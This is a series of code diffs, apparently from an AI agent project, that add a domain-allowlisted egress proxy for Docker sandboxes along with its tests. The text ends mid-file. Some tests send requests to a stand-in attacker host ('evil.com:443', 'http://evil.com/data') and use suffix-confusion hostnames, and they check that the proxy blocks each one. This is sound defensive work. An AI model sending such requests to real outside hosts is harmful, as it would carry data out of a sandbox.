+"""Tests for the sandbox egress allowlist (security-critical host matching)."""
+
+import contextlib
+import http.client
+import socket
+import subprocess
+import threading
+from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
+from pathlib import Path
+
+import pytest
+
+from tools.environments import egress_proxy
+from tools.environments import egress_proxy_server as eps
+
+
+# ── host_allowed: the default-deny matching core ──────────────────
+
+
+def test_empty_allowlist_denies_everything():
+    assert eps.host_allowed("github.com", []) is False
+    assert eps.host_allowed("", ["github.com"]) is False
+
+
+def test_exact_match():
+    assert eps.host_allowed("github.com", ["github.com"]) is True
+    assert eps.host_allowed("GitHub.com", ["github.com"]) is True  # case-insensitive
+
+
+def test_bare_domain_authorizes_subdomains():
+    assert eps.host_allowed("api.github.com", ["github.com"]) is True
+    assert eps.host_allowed("a.b.github.com", ["github.com"]) is True
+
+
+def test_wildcard_matches_subdomains_not_apex():
+    al = ["*.githubusercontent.com"]
+    assert eps.host_allowed("objects.githubusercontent.com", al) is True
+    assert eps.host_allowed("githubusercontent.com", al) is False
+
+
+def test_suffix_confusion_is_rejected():
+    """A host that merely ends with the allowed string must NOT match."""
+    al = ["example.com"]
+    assert eps.host_allowed("notexample.com", al) is False
+    assert eps.host_allowed("evilexample.com", al) is False
+    # Attacker-controlled parent domain must not be authorized by a child entry.
+    assert eps.host_allowed("example.com.evil.com", al) is False
+
+
+def test_trailing_dot_normalized():
+    assert eps.host_allowed("github.com.", ["github.com"]) is True
+
+
+def test_ip_literal_requires_exact_match():
+    """A literal IP entry authorizes only itself — no subdomain/suffix logic."""
+    al = ["1.2.3.4"]
+    assert eps.host_allowed("1.2.3.4", al) is True
+    assert eps.host_allowed("x.1.2.3.4", al) is False
+    assert eps.host_allowed("11.2.3.4", al) is False
+    assert eps.host_allowed("1.2.3.4.evil.com", al) is False
+
+
+def test_ipv6_literal_exact_match():
+    assert eps.host_allowed("::1", ["::1"]) is True
+    assert eps.host_allowed("::2", ["::1"]) is False
+
+
+# ── parse_allowlist ───────────────────────────────────────────────
+
+
+def test_parse_allowlist_splits_and_dedupes():
+    assert eps.parse_allowlist("github.com, pypi.org\nGITHUB.COM") == ["github.com", "pypi.org"]
+    assert eps.parse_allowlist("") == []
+    assert eps.parse_allowlist(None) == []
+
+
+# ── orchestration naming is deterministic & allowlist-sensitive ───
+
+
+def test_names_are_deterministic_and_order_insensitive():
+    n1, p1 = egress_proxy._names(["github.com", "pypi.org"])
+    n2, p2 = egress_proxy._names(["pypi.org", "github.com"])  # reordered
+    assert (n1, p1) == (n2, p2)
+    assert n1.startswith("hermes-egress-")
+    assert p1.startswith("hermes-egress-proxy-")
+
+
+def test_different_allowlists_get_different_networks():
+    n1, _ = egress_proxy._names(["github.com"])
+    n2, _ = egress_proxy._names(["github.com", "pypi.org"])
+    assert n1 != n2
+
+
+def test_proxy_env_points_at_alias():
+    env = egress_proxy._proxy_env()
+    assert env["HTTPS_PROXY"] == f"http://{egress_proxy.PROXY_ALIAS}:{egress_proxy.PROXY_PORT}"
+    assert env["http_proxy"] == env["HTTP_PROXY"]
+    assert "127.0.0.1" in env["NO_PROXY"]
+
+
+# ── orchestration: provisioning / dual-homing / prune (mocked docker) ──
+
+
+def _cp(rc: int = 0, out: str = "", err: str = "") -> subprocess.CompletedProcess:
+    return subprocess.CompletedProcess(args=["docker"], returncode=rc, stdout=out, stderr=err)
+
+
+def test_ensure_network_creates_internal_with_label(monkeypatch):
+    calls = []
+
+    def fake(*args, **kw):
+        calls.append(args)
+        if args[:2] == ("network", "inspect"):
+            return _cp(1, err="not found")
+        return _cp(0)
+
+    monkeypatch.setattr(egress_proxy, "_docker", fake)
+    egress_proxy._ensure_network("hermes-egress-test")
+    create = next(c for c in calls if c[:2] == ("network", "create"))
+    assert "--internal" in create
+    assert "--label" in create and f"{egress_proxy._EGRESS_LABEL}=1" in create
+
+
+def test_ensure_network_lost_create_race_is_ok(monkeypatch):
+    """create failing because another process won the race must not raise."""
+    inspects = {"n": 0}
+
+    def fake(*args, **kw):
+        if args[:2] == ("network", "inspect"):
+            inspects["n"] += 1
+            return _cp(0 if inspects["n"] > 1 else 1)
+        if args[:2] == ("network", "create"):
+            return _cp(1, err="network already exists")
+        return _cp(0)
+
+    monkeypatch.setattr(egress_proxy, "_docker", fake)
+    egress_proxy._ensure_network("hermes-egress-test")  # no raise
+
+
+def test_ensure_network_real_failure_raises(monkeypatch):
+    def fake(*args, **kw):
+        if args[:2] == ("network", "inspect"):
+            return _cp(1)
+        if args[:2] == ("network", "create"):
+            return _cp(1, err="permission denied")
+        return _cp(0)
+
+    monkeypatch.setattr(egress_proxy, "_docker", fake)
+    with pytest.raises(RuntimeError, match="permission denied"):
+        egress_proxy._ensure_network("hermes-egress-test")
+
+
+def test_start_proxy_noop_when_already_running(monkeypatch):
+    calls = []
+
+    def fake(*args, **kw):
+        calls.append(args)
+        if args[0] == "inspect" and "{{.State.Running}}" in args:
+            return _cp(0, out="true\n")
+        return _cp(0)
+
+    monkeypatch.setattr(egress_proxy, "_docker", fake)
+    egress_proxy._start_proxy("net-x", "proxy-x", ["github.com"])
+    assert not any(c[0] == "run" for c in calls)
+
+
+def test_start_proxy_restarts_stopped_container(monkeypatch):
+    calls = []
+    running = iter(["false", "true"])  # before start / after start
+
+    def fake(*args, **kw):
+        calls.append(args)
+        if args[0] == "inspect" and "{{.State.Running}}" in args:
+            return _cp(0, out=next(running))
+        if args[0] == "inspect" and "{{.State.Status}}" in args:
+            return _cp(0, out="exited")
+        return _cp(0)
+
+    monkeypatch.setattr(egress_proxy, "_docker", fake)
+    egress_proxy._start_proxy("net-x", "proxy-x", [])
+    assert ("start", "proxy-x") in calls
+    assert not any(c[0] == "run" for c in calls)
+
+
+def test_start_proxy_creates_labeled_container_and_dual_homes(monkeypatch):
+    calls = []
+
+    def fake(*args, **kw):
+        calls.append(args)
+        if args[0] == "inspect":
+            return _cp(1)  # doesn't exist yet
+        return _cp(0)
+
+    monkeypatch.setattr(egress_proxy, "_docker", fake)
+    monkeypatch.setattr(egress_proxy, "find_docker", lambda: "/usr/local/bin/docker")
+    egress_proxy._start_proxy("net-x", "proxy-x", ["github.com"])
+    run = next(c for c in calls if c[0] == "run")
+    assert "--label" in run and f"{egress_proxy._EGRESS_LABEL}=1" in run
+    assert run[run.index("--network") + 1] == "net-x"
+    assert "EGRESS_ALLOWLIST=github.com" in run
+    assert ("network", "connect", "bridge", "proxy-x") in calls
+
+
+def test_start_proxy_connect_failure_fails_closed(monkeypatch):
+    """No outbound connectivity would mean 502s forever — raise + clean up."""
+    calls = []
+
+    def fake(*args, **kw):
+        calls.append(args)
+        if args[0] == "inspect":
+            return _cp(1)
+        if args[:2] == ("network", "connect"):
+            return _cp(1, err="no such network: bridge")
+        return _cp(0)
+
+    monkeypatch.setattr(egress_proxy, "_docker", fake)
+    monkeypatch.setattr(egress_proxy, "find_docker", lambda: "/usr/local/bin/docker")
+    with pytest.raises(RuntimeError, match="no such network"):
+        egress_proxy._start_proxy("net-x", "proxy-x", [])
+    assert ("rm", "-f", "proxy-x") in calls
+
+
+def test_start_proxy_already_connected_is_ok(monkeypatch):
+    def fake(*args, **kw):
+        if args[0] == "inspect":
+            return _cp(1)
+        if args[:2] == ("network", "connect"):
+            return _cp(1, err="endpoint proxy-x already exists in network bridge")
+        return _cp(0)
+
+    monkeypatch.setattr(egress_proxy, "_docker", fake)
+    monkeypatch.setattr(egress_proxy, "find_docker", lambda: "/usr/local/bin/docker")
+    egress_proxy._start_proxy("net-x", "proxy-x", [])  # no raise
+
+
+def test_outbound_network_resolution(monkeypatch):
+    monkeypatch.setattr(egress_proxy, "find_docker", lambda: "/usr/local/bin/docker")
+    assert egress_proxy._outbound_network() == "bridge"
+    monkeypatch.setattr(egress_proxy, "find_docker", lambda: "/opt/homebrew/bin/podman")
+    assert egress_proxy._outbound_network() == "podman"
+    monkeypatch.setattr(egress_proxy, "find_docker", lambda: None)
+    assert egress_proxy._outbound_network() == "bridge"
+
+
+def test_ensure_allowlisted_network_happy_path(monkeypatch):
+    def fake(*args, **kw):
+        if args[0] == "inspect" or args[:2] == ("network", "inspect"):
+            return _cp(1)  # nothing exists yet
+        return _cp(0)
+
+    monkeypatch.setattr(egress_proxy, "_docker", fake)
+    monkeypatch.setattr(egress_proxy, "find_docker", lambda: "/usr/local/bin/docker")
+    result = egress_proxy.ensure_allowlisted_network(["github.com"])
+    expected_network, _ = egress_proxy._names(["github.com"])
+    assert result.network == expected_network
+    assert result.proxy_env["HTTP_PROXY"].endswith(f":{egress_proxy.PROXY_PORT}")
+
+
+def test_prune_removes_unattached_proxy(monkeypatch):
+    calls = []
+
+    def fake(*args, **kw):
+        calls.append(args)
+        if args[:2] == ("network", "ls"):
+            return _cp(0, out="hermes-egress-abc123\n")
+        if args[:2] == ("network", "inspect"):
+            return _cp(0, out="hermes-egress-proxy-abc123 ")
+        return _cp(0)
+
+    monkeypatch.setattr(egress_proxy, "_docker", fake)
+    assert egress_proxy.prune_egress_proxies() == 1
+    assert ("rm", "-f", "hermes-egress-proxy-abc123") in calls
+    assert ("network", "rm", "hermes-egress-abc123") in calls
+
+
+def test_prune_keeps_networks_still_in_use(monkeypatch):
+    calls = []
+
+    def fake(*args, **kw):
+        calls.append(args)
+        if args[:2] == ("network", "ls"):
+            return _cp(0, out="hermes-egress-abc123\n")
+        if args[:2] == ("network", "inspect"):
+            return _cp(0, out="hermes-egress-proxy-abc123 hermes-sandbox-1 ")
+        return _cp(0)
+
+    monkeypatch.setattr(egress_proxy, "_docker", fake)
+    assert egress_proxy.prune_egress_proxies() == 0
+    assert not any(c[0] == "rm" for c in calls)
+    assert not any(c[:2] == ("network", "rm") for c in calls)
+
+
+def test_prune_survives_ls_failure(monkeypatch):
+    monkeypatch.setattr(egress_proxy, "_docker", lambda *a, **k: _cp(1, err="daemon down"))
+    assert egress_proxy.prune_egress_proxies() == 0
+
+
+# ── proxy server integration (real HTTP server, loopback only) ────
+
+
+@contextlib.contextmanager
+def _running_proxy(allowlist):
+    """Run _ProxyHandler on an ephemeral loopback port with a given allowlist."""
+    old = eps._ALLOWLIST
+    eps._ALLOWLIST = allowlist
+    server = ThreadingHTTPServer(("127.0.0.1", 0), eps._ProxyHandler)
+    server.daemon_threads = True
+    thread = threading.Thread(target=server.serve_forever, daemon=True)
+    thread.start()
+    try:
+        yield server.server_address[1]
+    finally:
+        server.shutdown()
+        server.server_close()
+        eps._ALLOWLIST = old
+
+
+def _connect_via_proxy(proxy_port: int, authority: str) -> bytes:
+    """Send a raw CONNECT and return the first response chunk."""
+    with socket.create_connection(("127.0.0.1", proxy_port), timeout=10) as s:
+        s.sendall(f"CONNECT {authority} HTTP/1.1\r\nHost: {authority}\r\n\r\n".encode())
+        return s.recv(4096)
+
+
+def test_proxy_denies_connect_to_unlisted_host():
+    with _running_proxy(["github.com"]) as port:
+        resp = _connect_via_proxy(port, "evil.com:443")
+    assert resp.split(b"\r\n", 1)[0].split(b" ")[1] == b"403"
+
+
+def test_proxy_denies_plain_http_to_unlisted_host():
+    with _running_proxy(["github.com"]) as port:
+        conn = http.client.HTTPConnection("127.0.0.1", port, timeout=10)
+        conn.request("GET", "http://evil.com/data")
+        resp = conn.getresponse()
+        assert resp.status == 403
+        conn.close()
+
+
+def test_proxy_tunnels_connect_to_allowed_host():
+    """CONNECT to an allowlisted host must blind-tunnel bytes both ways."""
+    echo = socket.socket()
+    echo.bind(("127.0.0.1", 0))
+    echo.listen(1)
+    echo_port = echo.getsockname()[1]
+
+    def _serve_one():
+        conn, _ = echo.accept()
+        with conn:
+            conn.sendall(conn.recv(1024))
+
+    threading.Thread(target=_serve_one, daemon=True).start()
+    try:
+        with _running_proxy(["127.0.0.1"]) as port:
+            with socket.create_connection(("127.0.0.1", port), timeout=10) as s:
+                s.sendall(f"CONNECT 127.0.0.1:{echo_port} HTTP/1.1\r\n\r\n".encode())
+                established = s.recv(4096)
+                assert b" 200 " in established.split(b"\r\n", 1)[0] + b" "
+                s.sendall(b"ping-through-tunnel")
+                assert s.recv(1024) == b"ping-through-tunnel"
+    finally:
+        echo.close()
+
+
+def test_proxy_forwards_plain_http_to_allowed_host():
+    class _Upstream(BaseHTTPRequestHandler):
+        def do_GET(self):
+            body = b"hello-from-upstream"
+            self.send_response(200)
+            self.send_header("Content-Length", str(len(body)))
+            self.end_headers()
+            self.wfile.write(body)
+
+        def log_message(self, *args):
+            pass
+
+    upstream = ThreadingHTTPServer(("127.0.0.1", 0), _Upstream)
+    upstream.daemon_threads = True
+    threading.Thread(target=upstream.serve_forever, daemon=True).start()
+    up_port = upstream.server_address[1]
+    try:
+        with _running_proxy(["127.0.0.1"]) as port:
+            conn = http.client.HTTPConnection("127.0.0.1", port, timeout=10)
+            conn.request("GET", f"http://127.0.0.1:{up_port}/")
+            resp = conn.getresponse()
+            assert resp.status == 200
+            assert resp.read() == b"hello-from-upstream"
+            conn.close()
+    finally:
+        upstream.shutdown()
+        upstream.server_close()
+
+
+def test_proxy_returns_502_when_upstream_unreachable():
+    # Grab a port that nothing is listening on.
+    tmp = socket.socket()
+    tmp.bind(("127.0.0.1", 0))
+    closed_port = tmp.getsockname()[1]
+    tmp.close()
+
+    with _running_proxy(["127.0.0.1"]) as port:
+        resp = _connect_via_proxy(port, f"127.0.0.1:{closed_port}")
+    assert resp.split(b"\r\n", 1)[0].split(b" ")[1] == b"502"
+
+
+# ── config wiring: the settings must actually reach the sandbox layer ──
+
+
+def test_get_env_config_reads_egress_settings(monkeypatch):
+    import tools.terminal_tool as terminal_tool
+
+    monkeypatch.setenv("TERMINAL_CONTAINER_NETWORK", "allowlist")
+    monkeypatch.setenv("TERMINAL_CONTAINER_NETWORK_ALLOWLIST", '["github.com", "pypi.org"]')
+    cfg = terminal_tool._get_env_config()
+    assert cfg["container_network"] == "allowlist"
+    assert cfg["container_network_allowlist"] == ["github.com", "pypi.org"]
+
+
+def test_get_env_config_egress_defaults(monkeypatch):
+    import tools.terminal_tool as terminal_tool
+
+    monkeypatch.delenv("TERMINAL_CONTAINER_NETWORK", raising=False)
+    monkeypatch.delenv("TERMINAL_CONTAINER_NETWORK_ALLOWLIST", raising=False)
+    cfg = terminal_tool._get_env_config()
+    assert cfg["container_network"] == "on"
+    assert cfg["container_network_allowlist"] == []
+
+
+def test_startup_bridges_map_egress_env_vars():
+    """Regression guard for the config.yaml → env-var bridge.
+
+    The sandbox layer once shipped fully unit-tested but inert, because the
+    two startup maps below never bridged container_network*. They are local
+    dicts inside functions, so assert on the source directly.
+    """
+    repo = Path(__file__).resolve().parents[2]
+    for rel in ("cli.py", "gateway/run.py"):
+        src = (repo / rel).read_text(encoding="utf-8")
+        assert '"container_network": "TERMINAL_CONTAINER_NETWORK"' in src, rel
+        assert (
+            '"container_network_allowlist": "TERMINAL_CONTAINER_NETWORK_ALLOWLIST"' in src
+        ), rel

--- a/tests/tools/test_egress_proxy.py
+++ b/tests/tools/test_egress_proxy.py
@@ -505,7 +505,6 @@ def test_file_tools_path_egress_reaches_docker_environment(monkeypatch):
     import tools.file_tools as ft
 
     monkeypatch.setattr(ft, "_file_ops_cache", {})
-    monkeypatch.setattr(ft, "_last_known_cwd", {})
     captured = _drive_creation_path(
         monkeypatch, lambda: ft._get_file_ops("egress-files"),
     )

--- a/tools/code_execution_tool.py
+++ b/tools/code_execution_tool.py
@@ -745,6 +745,8 @@ def _get_or_create_env(task_id: str):
                 "docker_volumes": config.get("docker_volumes", []),
                 "docker_run_as_host_user": config.get("docker_run_as_host_user", False),
                 "docker_network": config.get("docker_network", True),
+                "container_network": config.get("container_network", "on"),
+                "container_network_allowlist": config.get("container_network_allowlist", []),
             }
 
         ssh_config = None

--- a/tools/environments/docker.py
+++ b/tools/environments/docker.py
@@ -719,14 +719,20 @@ class DockerEnvironment(BaseEnvironment):
         # Egress control. "on" keeps full network (current default), "off" cuts
         # all network, "allowlist" routes HTTP(S) through a domain-filtered proxy
         # on an --internal network (raw/non-proxied egress has no route out).
+        # ``_effective_network`` records the NetworkMode a fresh container gets
+        # so the reuse guard below can validate persisted containers against
+        # the current config (None == "on": no exact expectation).
+        self._effective_network: Optional[str] = None
         if self._network_mode == "off":
             resource_args.append("--network=none")
+            self._effective_network = "none"
         elif self._network_mode == "allowlist":
             try:
                 from tools.environments.egress_proxy import ensure_allowlisted_network
 
                 proxy = ensure_allowlisted_network(self._network_allowlist)
                 resource_args.extend(["--network", proxy.network])
+                self._effective_network = proxy.network
                 # Inject proxy env so package managers / git / curl route through it.
                 # Merged into self._env here so it lands in both the `docker run -e`
                 # args and the init_session snapshot (subsequent exec inherits it).
@@ -753,6 +759,7 @@ class DockerEnvironment(BaseEnvironment):
                     exc_info=True,
                 )
                 resource_args.append("--network=none")
+                self._effective_network = "none"
 
         # Persistent workspace via bind mounts from a configurable host directory
         # (TERMINAL_SANDBOX_DIR, default ~/.hermes/sandboxes/). Non-persistent
@@ -1013,27 +1020,22 @@ class DockerEnvironment(BaseEnvironment):
                 container_id, state = existing
                 # Network-mode guard: reuse must not silently defeat an
                 # egress lockdown.  A container created before the operator
-                # set ``docker_network: false`` keeps its original bridge
-                # NetworkMode, so label-only reuse would hand the agent a
-                # networked container despite the config.  On mismatch we
-                # remove the stale container and start fresh — leaving it in
-                # place would let the next label-based reuse pick it up again.
-                # Only the lockdown direction is guarded: a ``none``-mode
-                # container under a default-network config is left alone so
-                # operators using ``docker_extra_args: ["--network=none"]``
-                # don't get their container churned on every startup.
-                mode_mismatch = False
-                actual_mode = None
-                if not network:
-                    actual_mode = self._container_network_mode(container_id)
-                    mode_mismatch = actual_mode != "none"
+                # tightened ``container_network`` (or set ``docker_network:
+                # false``) keeps its original NetworkMode, so label-only reuse
+                # would hand the agent a networked container despite the
+                # config.  On mismatch we remove the stale container and start
+                # fresh — leaving it in place would let the next label-based
+                # reuse pick it up again.  See _reuse_network_mismatch for the
+                # per-mode expectations.
+                mode_mismatch, actual_mode = self._reuse_network_mismatch(container_id)
                 if mode_mismatch:
                     logger.warning(
-                        "Existing container %s has NetworkMode=%s but "
-                        "docker_network=false requests an air-gapped "
-                        "container — removing it and starting fresh "
-                        "(task=%s, profile=%s).",
+                        "Existing container %s is on network %r but "
+                        "container_network=%r expects %r — removing it and "
+                        "starting fresh (task=%s, profile=%s).",
                         container_id[:12], actual_mode or "unknown",
+                        self._network_mode,
+                        self._effective_network or "no hermes-egress network",
                         task_label, profile_name,
                     )
                     try:
@@ -1378,6 +1380,31 @@ class DockerEnvironment(BaseEnvironment):
             return None
         mode = result.stdout.strip()
         return mode or None
+
+    def _reuse_network_mismatch(self, container_id: str) -> tuple[bool, Optional[str]]:
+        """True when a reused container's NetworkMode conflicts with the
+        current egress config, plus the inspected mode for logging.
+
+        - ``off`` / ``allowlist`` (``_effective_network`` is set): the
+          container must sit exactly on the expected network — ``none``, or
+          the ``hermes-egress-<hash>`` network for the *current* allowlist
+          (a changed allowlist hashes to a different network, so stale
+          bridge and different-allowlist containers both mismatch).  A
+          failed inspect (``None``) counts as a mismatch: never hand out
+          unverified egress under lockdown.
+        - ``on``: only containers stranded on a ``hermes-egress-*`` internal
+          network are replaced — they have no route out at all under an
+          open-network config.  ``none``/bridge/anything else is left alone
+          so operators using ``docker_extra_args: ["--network=none"]`` don't
+          get their container churned on every startup, and a failed inspect
+          keeps the container (nothing to lock down).
+        """
+        actual = self._container_network_mode(container_id)
+        if self._effective_network is not None:
+            return actual != self._effective_network, actual
+        from tools.environments.egress_proxy import EGRESS_NETWORK_PREFIX
+
+        return bool(actual) and actual.startswith(EGRESS_NETWORK_PREFIX), actual
 
     def _find_reusable_container(self, task_label: str, profile_label: str) -> Optional[tuple[str, str]]:
         """Look for an existing container labeled for this (task, profile).

--- a/tools/environments/docker.py
+++ b/tools/environments/docker.py
@@ -36,6 +36,12 @@ _DOCKER_SEARCH_PATHS = [
 
 _docker_executable: Optional[str] = None  # resolved once, cached
 _ENV_VAR_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
+# Hostname/domain allowlist entries: labels of alphanumerics/hyphens joined by
+# dots. Permits a leading "*." wildcard and bare IPv4 literals.
+_ALLOWLIST_HOST_RE = re.compile(
+    r"^(?:\*\.)?(?:[A-Za-z0-9_](?:[A-Za-z0-9_-]{0,61}[A-Za-z0-9_])?\.)*"
+    r"[A-Za-z0-9_](?:[A-Za-z0-9_-]{0,61}[A-Za-z0-9_])?$"
+)
 
 
 def _normalize_forward_env_names(forward_env: list[str] | None) -> list[str]:
@@ -90,6 +96,67 @@ def _normalize_env_dict(env: dict | None) -> dict[str, str]:
                 continue
         normalized[key] = value
 
+    return normalized
+
+
+_VALID_NETWORK_MODES = ("on", "off", "allowlist")
+
+
+def _resolve_network_mode(network_mode: Optional[str], network: bool) -> str:
+    """Resolve the effective egress mode.
+
+    ``network_mode`` (``"on"`` | ``"off"`` | ``"allowlist"``) takes precedence.
+    When it is None/empty, fall back to the legacy ``network`` bool
+    (``True`` -> ``"on"``, ``False`` -> ``"off"``). Unknown values fail CLOSED to
+    ``"off"`` — a typo in an egress-control setting must never silently grant
+    full network access.
+    """
+    if network_mode is None or network_mode == "":
+        return "on" if network else "off"
+    mode = str(network_mode).strip().lower()
+    if mode not in _VALID_NETWORK_MODES:
+        logger.error(
+            "Unknown container_network value %r; expected one of %s. "
+            "Failing closed to 'off' (no network). Fix the config to restore egress.",
+            network_mode,
+            _VALID_NETWORK_MODES,
+        )
+        return "off"
+    return mode
+
+
+def _normalize_allowlist(allowlist: list[str] | None) -> list[str]:
+    """Validate and deduplicate a domain allowlist for ``allowlist`` egress mode.
+
+    Entries are lowercased hostnames/domains (no scheme, no path). Invalid
+    entries are dropped with a warning rather than failing container startup.
+    """
+    if not allowlist:
+        return []
+    if not isinstance(allowlist, list):
+        logger.warning("container_network_allowlist is not a list: %r", allowlist)
+        return []
+
+    normalized: list[str] = []
+    seen: set[str] = set()
+    for item in allowlist:
+        if not isinstance(item, str):
+            logger.warning("Ignoring non-string allowlist entry: %r", item)
+            continue
+        host = item.strip().lower()
+        # Strip an accidental scheme or trailing path/port the user may have pasted.
+        if "://" in host:
+            host = host.split("://", 1)[1]
+        host = host.split("/", 1)[0].split(":", 1)[0]
+        if not host:
+            continue
+        if not _ALLOWLIST_HOST_RE.match(host):
+            logger.warning("Ignoring invalid allowlist host: %r", item)
+            continue
+        if host in seen:
+            continue
+        seen.add(host)
+        normalized.append(host)
     return normalized
 
 
@@ -591,6 +658,8 @@ class DockerEnvironment(BaseEnvironment):
         forward_env: list[str] | None = None,
         env: dict | None = None,
         network: bool = True,
+        network_mode: Optional[str] = None,
+        network_allowlist: list[str] | None = None,
         host_cwd: str = None,
         auto_mount_cwd: bool = False,
         run_as_host_user: bool = False,
@@ -605,6 +674,12 @@ class DockerEnvironment(BaseEnvironment):
         self._task_id = task_id
         self._forward_env = _normalize_forward_env_names(forward_env)
         self._env = _normalize_env_dict(env)
+
+        # Resolve effective egress mode. ``network_mode`` (on/off/allowlist) is the
+        # primary control; the legacy ``network`` bool is kept for backwards compat
+        # (network=False == network_mode="off"). See _SECURITY_ARGS / egress_proxy.
+        self._network_mode = _resolve_network_mode(network_mode, network)
+        self._network_allowlist = _normalize_allowlist(network_allowlist)
         self._container_id: Optional[str] = None
         self._labels: dict[str, str] = {}
         self._image: str = ""
@@ -639,8 +714,43 @@ class DockerEnvironment(BaseEnvironment):
                     "Docker storage driver does not support per-container disk limits "
                     "(requires overlay2 on XFS with pquota). Container will run without disk quota."
                 )
-        if not network:
+        # Egress control. "on" keeps full network (current default), "off" cuts
+        # all network, "allowlist" routes HTTP(S) through a domain-filtered proxy
+        # on an --internal network (raw/non-proxied egress has no route out).
+        if self._network_mode == "off":
             resource_args.append("--network=none")
+        elif self._network_mode == "allowlist":
+            try:
+                from tools.environments.egress_proxy import ensure_allowlisted_network
+
+                proxy = ensure_allowlisted_network(self._network_allowlist)
+                resource_args.extend(["--network", proxy.network])
+                # Inject proxy env so package managers / git / curl route through it.
+                # Merged into self._env here so it lands in both the `docker run -e`
+                # args and the init_session snapshot (subsequent exec inherits it).
+                overridden = sorted(
+                    k for k in proxy.proxy_env
+                    if k in self._env and self._env[k] != proxy.proxy_env[k]
+                )
+                if overridden:
+                    # Not a bypass — the internal network has no route out — but
+                    # traffic pointed away from the proxy will just fail.
+                    logger.warning(
+                        "docker_env overrides egress proxy settings (%s); "
+                        "connections not routed through the proxy have no route out.",
+                        ", ".join(overridden),
+                    )
+                self._env = {**proxy.proxy_env, **self._env}
+            except Exception as e:
+                # Fail closed: if the egress proxy can't be set up, do NOT fall
+                # back to open network — cut egress entirely and surface the error.
+                logger.error(
+                    "Failed to set up allowlist egress proxy (%s). "
+                    "Falling back to --network=none (fail-closed).",
+                    e,
+                    exc_info=True,
+                )
+                resource_args.append("--network=none")
 
         # Persistent workspace via bind mounts from a configurable host directory
         # (TERMINAL_SANDBOX_DIR, default ~/.hermes/sandboxes/). Non-persistent

--- a/tools/environments/docker.py
+++ b/tools/environments/docker.py
@@ -105,14 +105,16 @@ _VALID_NETWORK_MODES = ("on", "off", "allowlist")
 def _resolve_network_mode(network_mode: Optional[str], network: bool) -> str:
     """Resolve the effective egress mode.
 
-    ``network_mode`` (``"on"`` | ``"off"`` | ``"allowlist"``) takes precedence.
-    When it is None/empty, fall back to the legacy ``network`` bool
-    (``True`` -> ``"on"``, ``False`` -> ``"off"``). Unknown values fail CLOSED to
-    ``"off"`` — a typo in an egress-control setting must never silently grant
-    full network access.
+    The legacy ``network=False`` remains a hard deny even when a newer
+    ``network_mode`` value is also present. During config migration both keys
+    can be populated from defaults, and a historical deny must never be
+    weakened to ``on``. Otherwise ``network_mode`` selects ``"on"`` |
+    ``"off"`` | ``"allowlist"``. Unknown values fail CLOSED.
     """
+    if not network:
+        return "off"
     if network_mode is None or network_mode == "":
-        return "on" if network else "off"
+        return "on"
     mode = str(network_mode).strip().lower()
     if mode not in _VALID_NETWORK_MODES:
         logger.error(

--- a/tools/environments/egress_proxy.py
+++ b/tools/environments/egress_proxy.py
@@ -35,6 +35,10 @@ _SERVER_SCRIPT = os.path.join(os.path.dirname(__file__), "egress_proxy_server.py
 # Label stamped on every egress network/proxy so prune_egress_proxies() (and
 # users, via `docker ps --filter label=...`) can enumerate what we created.
 _EGRESS_LABEL = "hermes.egress"
+# Every egress network is named <prefix><allowlist-hash>; the Docker reuse
+# guard matches on this prefix to spot containers stranded on an egress
+# network after the operator switched modes.
+EGRESS_NETWORK_PREFIX = "hermes-egress-"
 
 # Serialize provisioning so concurrent sandbox starts don't race on the same
 # network/proxy (T-1.1: isolate shared mutable state behind an explicit gate).
@@ -56,7 +60,18 @@ def _allowlist_hash(allowlist: list[str]) -> str:
 
 def _names(allowlist: list[str]) -> tuple[str, str]:
     h = _allowlist_hash(allowlist)
-    return f"hermes-egress-{h}", f"hermes-egress-proxy-{h}"
+    return f"{EGRESS_NETWORK_PREFIX}{h}", f"{EGRESS_NETWORK_PREFIX}proxy-{h}"
+
+
+def expected_network_name(allowlist: list[str]) -> str:
+    """Name of the internal egress network *allowlist* would provision.
+
+    Pure (no docker calls) — same canonicalization/hash as
+    ensure_allowlisted_network(), so the Docker reuse path can validate a
+    persisted container's NetworkMode without provisioning anything.
+    """
+    network, _proxy = _names(allowlist)
+    return network
 
 
 def _docker(*args: str, timeout: int = 120) -> subprocess.CompletedProcess:

--- a/tools/environments/egress_proxy.py
+++ b/tools/environments/egress_proxy.py
@@ -1,0 +1,212 @@
+"""Domain-allowlisted egress proxy for the Docker sandbox ("allowlist" mode).
+
+When ``terminal.container_network: "allowlist"`` is set, sandbox containers are
+attached to a per-allowlist ``--internal`` Docker network (no route to the
+internet) and pointed at a shared forward proxy via ``HTTP(S)_PROXY``. The proxy
+(:mod:`tools.environments.egress_proxy_server`, run inside a ``python:3.13-slim``
+container that is dual-homed onto the bridge network) only forwards to allowlisted
+domains. Net effect:
+
+- HTTP(S) to an allowlisted domain  -> allowed (via proxy)
+- HTTP(S) to any other domain       -> 403 from the proxy
+- raw sockets / non-proxied egress  -> no route out (internal network)
+
+The proxy is keyed by a hash of the (sorted) allowlist, so different allowlists
+get isolated networks/proxies and identical ones are reused.
+"""
+
+import hashlib
+import logging
+import os
+import subprocess
+import threading
+from dataclasses import dataclass, field
+
+from tools.environments.docker import find_docker
+
+logger = logging.getLogger(__name__)
+
+# python-slim is pulled from the same registry as the sandbox images; override
+# with HERMES_EGRESS_PROXY_IMAGE if you mirror images internally.
+PROXY_IMAGE = os.environ.get("HERMES_EGRESS_PROXY_IMAGE", "python:3.13-slim")
+PROXY_PORT = 8888
+PROXY_ALIAS = "egress-proxy"  # stable DNS name on the internal network
+_SERVER_SCRIPT = os.path.join(os.path.dirname(__file__), "egress_proxy_server.py")
+# Label stamped on every egress network/proxy so prune_egress_proxies() (and
+# users, via `docker ps --filter label=...`) can enumerate what we created.
+_EGRESS_LABEL = "hermes.egress"
+
+# Serialize provisioning so concurrent sandbox starts don't race on the same
+# network/proxy (T-1.1: isolate shared mutable state behind an explicit gate).
+_lock = threading.Lock()
+
+
+@dataclass
+class EgressProxy:
+    """Result of provisioning: the internal network name and proxy env vars."""
+
+    network: str
+    proxy_env: dict = field(default_factory=dict)
+
+
+def _allowlist_hash(allowlist: list[str]) -> str:
+    canonical = ",".join(sorted(h.strip().lower() for h in allowlist if h.strip()))
+    return hashlib.sha256(canonical.encode()).hexdigest()[:10]
+
+
+def _names(allowlist: list[str]) -> tuple[str, str]:
+    h = _allowlist_hash(allowlist)
+    return f"hermes-egress-{h}", f"hermes-egress-proxy-{h}"
+
+
+def _docker(*args: str, timeout: int = 120) -> subprocess.CompletedProcess:
